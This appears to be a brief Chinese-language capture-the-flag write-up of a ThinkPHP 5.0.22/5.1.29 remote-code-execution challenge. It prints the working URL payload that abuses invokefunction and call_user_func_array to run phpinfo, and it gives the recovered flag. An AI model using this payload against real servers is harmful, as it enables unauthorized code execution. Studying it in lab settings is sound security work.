[ThinkPHP]5-Rce 1
打开发现是一个ThinkPHP 5+框架,直接用ThinkPHP扫描工具
检测出是一个ThinkPHP 5.0.22/5.1.29的RCE漏洞,访问Payload
?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
直接在phpinfo()的环境变量里面找到flag
flag{56567b13-223b-448c-a644-4b003a020890}
标签:vars,invokefunction,phpinfo,flag,ThinkPHP,Rce From: https://www.cnblogs.com/tazmi/p/18537452